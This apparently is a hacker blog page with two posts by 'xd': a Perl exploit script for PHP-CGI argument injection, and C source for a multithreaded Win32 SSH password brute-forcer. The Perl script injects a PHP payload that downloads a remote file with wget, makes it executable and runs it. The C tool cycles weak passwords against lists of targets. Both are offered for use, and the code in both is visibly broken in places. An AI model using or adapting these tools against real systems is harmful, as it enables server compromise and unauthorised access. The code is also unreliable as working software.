Help pay for xds lawyer fees.
LR

[Exploit Updated]: PHP CGI – executes a payload wich is php shellexec(); ,My 3rd PERL expl…

Posted on 6th May 2012 in Android, BULLY BREAKDOWN, Codes, Exploits, Papers, Uncategorized

Done this, but, this is only a basic version wich, i guess does things in a nice way :)

it is my 3rd perl exploit , so pls dont bash me, any fixes etc would be appreciated BUT remember it is using the RIGHT method, ie: injecting php by shellexec()

wich IS a PHP CGI function, and the ONLY way it Will definately exec!

ALSO this CAN execute cmds ofc, i will addin a line if you wish to do this.. ok…

Ok now on with the show….

 


#!/usr/bin/perl
 ## PHP CGI exec-cmd/injection of code thru php tags by (xd)

###Greetz: My channel on efnet / #Haxnet , ppl @ps in it

###greetz#1: tropic,dolphin,galaxy,Mouse_,MeOwie,nme,Meta,roy-ITUG,rotor/aussies,even iCER ya prick :P 

###and pt.2: FUZi0N,Motd/AlbaHack,Serh/RoHack,l3th4l/smashthestack.org,gizmore/wechall.net (Best 2 wargames around!)

###and pt3: storm, ev0, insid, worldwide (yea my juped nick thx to a fbi infomant named: krashed ,but ya'll know tht ;;))

###and pt 4: fuckwitz , zeu ,and hell, i cant rmember ya all but, you know who ya are, the ppl who contribute and help.. i <3 yas..

###Crews: AB (My mentors,inspirators.. <3) , Br Hackers and the BR AnonOps/Antisec team,AlbaHack,RoHack,DARPA (still love most of yas BUT ONE!) <3 peanuter ..comeback br0)

### MAJOR fuckage to ONLY one: krashed / [krashed] - motherfucker, YOUR TIME is come!!
use IO::Socket;
use Socket;

if (@ARGV<2) {
print "Usage: $0 <host>\n";
print "OPTIONAL CMD USE BUT DISABLED : [Ex: id]>\n";
exit(-1);
}

##my $cmd_exec_payload = "<php? system($_GET[\'$cmd\']); ?>";  ## Optional
my $payload = "<php? shellexec(wget -q http://fbi.gov/0day.txt;chmod +x 0day.txt;perl -e 0day.txt); ?>";  ## Config here

my $host=$ARGV[0];
my $cmd=$ARGV[1];
my($host, $cmd) = @ARGV or usage();

sub Connect {
print "[+] Connecting ..\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] Connect Error ..\n";
exit(-1);
}

$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $payload ." HTTP/1.1\r\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "\n\n";

##$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $cmd_exec_payload ." HTTP/1.1\r\n";
##print $sock "Host: $host\n";
##print $sock "Accept: */*\n";
##print $sock "\n\n";

while () {
$rp = rand;
&Connect;
print "[+] Executing command exec payload thru php-shellexec: ( $cmd ) ..\n";
my $answer=0;
print $sock;
if ($sock) {
print "[+] Sent evilcode,running: ( $cmd ) ..\n";
while ($answer=<$sock>) {
print $answer;
print results "[*] Server reply: ( $answer ) ..\n";
}
}
}

Enjoy / xd–

comments: 0 » tags: , , , , , , ,

Win32 SSHd Bruter

Posted on 24th September 2011 in Codes

This is sshd bruter code for win32. 

#include <windows.h>
#include <winbase.h>
#include <stdio.h>
#include <string.h>
#include <sdk/win32-pthreads.h>  // you can move this to SDK folder ;) 

#define malefic malloc(256)
#define oneshot(x) ((x) - 1)

void usage(char *arg) {
fprintf(stderr, "Usage: %s <targets> <weak-pass-file> <port 22 [22 = default sshd]>\n",arg);
exit(EXIT_FAILURE);
}

//void thread_ownage(char *target,int port, char *fname){

void thread_ownage(void *passthru) {
struct info *test;
bzero(&test, sizeof(test)); // here is zero. te problem is this
test = (struct info *)passthru;
char *fname = malefic;
fname = test->filename;
char *target = malefic;
bzero(&target,sizeof(target));
target = test->host;
int port = test->port;
//printf("[D] DEBUG INSIDE THREAD_OWNAGE  %s DEBUG PORT %d\n",test->host,test->port);
FILE *race;
int record; // which is this?nope target port fname are
int m = count_data(fname);
//printf("[D] DEBUG PASS FILE  %s\n",fname);
struct pass {
char passwd[256];
} load[m];
if ((race = fopen(fname,"r")) == NULL) {
perror("fopen");
exit(-1);
}
//load passes
record = 0;
while(!feof(race)) {
fscanf(race,"%s",load[record].passwd);
record++;
}
for(record = 0; record < oneshot(m) ; record++) {
}
for(record = 0; record < oneshot(m) ; record++) {
int c = 0;
char lol[256];
bzero(lol,sizeof(lol));
char *string = load[record].passwd;
while( *string != '\0') {
sprintf(&lol1,"%c",*string++);
}
printf("[*] Attacking Target: %s on port: %d with weak user/pass: %s\n",target,port,lol);
weak_hack(target,target,port,lol,lol);
}
}

int main(int argc, char **argv) {
FILE *into;
char *targetfile = NULL;
int port;
if (argc != 4) {
usage(argv[0]);
}
targetfile = argv[1];
char *passfile = argv[2];
port = atoi(argv[3]);
int record = 0;
int npthread = count_data(targetfile);
struct targets {
char targets[256];
} list[npthread];
int tcounter;
pthread_t threads[(npthread-1)];
if ((into = fopen(targetfile,"r")) == NULL) {
perror("fopen");
exit(-1);
}
// load targets
record = 0;
while(!feof(into)) {
fscanf(into,"%s",list[record].targets); // remember last member is terminating file so remove it from thread etc..
record++;
}
// debug target list
for(record=0;record<oneshot(npthread);record++) {
printf("[!] TARGET: %s\n",list[record].targets);
}
struct info bla[npthread];
pthread_attr_t attr;
pthread_attr_init(&attr);
pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_JOINABLE);
printf("[+] Creating threads: %d \n",oneshot(npthread));
for (tcounter=0;tcounter<oneshot(npthread);tcounter++) {
bla[tcounter].port = port;
bla[tcounter].host = list[tcounter].targets;
bla[tcounter].filename = passfile;
pthread_create(&threads[tcounter],&attr,(void *)thread_ownage,(void *)&bla[tcounter]);
sleep(2);
}
printf("[+] Joining threads: %d\n",oneshot(npthread));
for (tcounter = 0; tcounter < oneshot(npthread); tcounter++) {
pthread_join(threads[tcounter],NULL);
}
}

OK some updates here, for the pcap and pthreads, they DO make these for windows, do not panic! the links are simple winpcap.org TRY find DevPack_3.0 and use this for pcap, or 3.1 latest…
Also, PLEASE use pthreads windows stes, there is a few wich are all ljnked from the main website, pthreads.org i believe .. theyre very simple, to then add to a locak sdk./ folder, or, just maybe try and add to your current sdks, modify your dsp file and go hard! XChange it in thew code so there is only one directory for ALL your sdks, wich is what I DO, or, use the Botmakers Tute ;) , thats kinda lame name for it but, it was directly from the src code of Agobotm, and about, still best way to configure the thing!
i add stdout/in tarball src, wich is also win32 headers, thats great for cygwin builds to, and, i have linked it to 2005, i just keep them seperated asin partitions, but for my projects i have one folder wich, i always keep upto date asin ssl etc…so, I just use that for all my stuff,and add if need for seperate things/bots etc, it is just, simpler :s.
I dont like a big folder full of src of project and src of other libs, but, like many things, you can usually safely add them to your project locally, like with pthreads, as folder pthreads, and pcap is devpack, and sdk, and v4 is newer, wich is not as great for our bruter but heck it is a devpackm,, id still try find atleast a 3.1 … it is abit harder but well worth it :s.
Anyhow, loook forward to seeing you make a nice link for ME to use it ;)
Maybe ill addin some things even, I seriously, am in middle of electrical storms, and, have now got a dead gfx so 2 weeks in safemode now, and, I have about 6 pcs so, i think ill fix it up with changing it for a nice core2duop :)
Cheers!
xd

comments: 9 » tags: